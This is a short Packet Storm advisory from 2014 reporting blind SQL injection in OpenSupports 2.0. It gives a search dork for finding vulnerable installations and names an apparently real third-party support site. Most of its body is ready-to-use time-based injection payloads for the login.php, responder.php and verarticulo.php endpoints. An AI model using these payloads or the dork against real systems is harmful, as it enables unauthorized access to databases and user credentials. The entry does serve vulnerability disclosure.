Open Supports 2.0 SQL Injection

2014-03-05T00:00:00
ID PACKETSTORM:125550
Type packetstorm
Reporter indoushka
Modified 2014-03-05T00:00:00

Description

                                        
                                            `Open Support Blind SQL Injection v2.0 Vulnerability  
===================================================  
Author indoushka  
=================  
vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar  
=================  
# Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved   
  
http://www.aot-algarve.com/support/index.php  
  
This vulnerability affects /support/login.php  
  
emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login  
  
This vulnerability affects /support/responder.php.   
  
idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/  
  
This vulnerability affects /support/verarticulo.php.  
  
/support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/  
`